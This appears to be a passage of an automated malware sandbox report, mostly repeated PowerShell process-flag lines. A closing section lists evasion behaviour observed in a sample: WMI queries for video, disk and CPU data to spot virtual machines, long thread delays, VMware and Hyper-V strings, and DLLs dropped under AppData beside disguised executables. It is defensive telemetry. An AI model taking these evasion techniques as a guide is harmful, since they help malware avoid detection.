Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 1400	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3272	Thread sleep count: 9457 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe TID: 4148	Thread sleep count: 57 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe TID: 4148	Thread sleep time: -570000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe TID: 5256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6060	Thread sleep count: 9418 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe TID: 6112	Thread sleep count: 2153 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 2080	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe TID: 1396	Thread sleep count: 143 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964	Thread sleep count: 1322 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940	Thread sleep count: 8865 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980	Thread sleep count: 8626 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4108	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 4020	Thread sleep time: -120000s >= -30000s

Source: C:\Users\user\AppData\Local\Google\ofg.exe

Thread sleep count: Count: 2153 delay: -10

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 9457	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9418	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Window / User API: threadDelayed 2153	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1322
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8865
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8626

Source: C:\Users\user\Desktop\N2wufLmC74.exe	API coverage: 2.2 %
Source: C:\Users\user\AppData\Local\Google\brave.exe	API coverage: 9.5 %

Source: C:\Users\user\AppData\Local\Google\brave.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Registry key enumerated: More than 322 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000

Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: vbc.exe, 00000035.00000003.448875909.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!@!!
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: vbc.exe, 00000035.00000003.360226289.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: vbc.exe, 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.368129928.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: vbc.exe, 00000035.00000003.448875909.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: vbc.exe, 00000002.00000002.359946391.0000000005664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

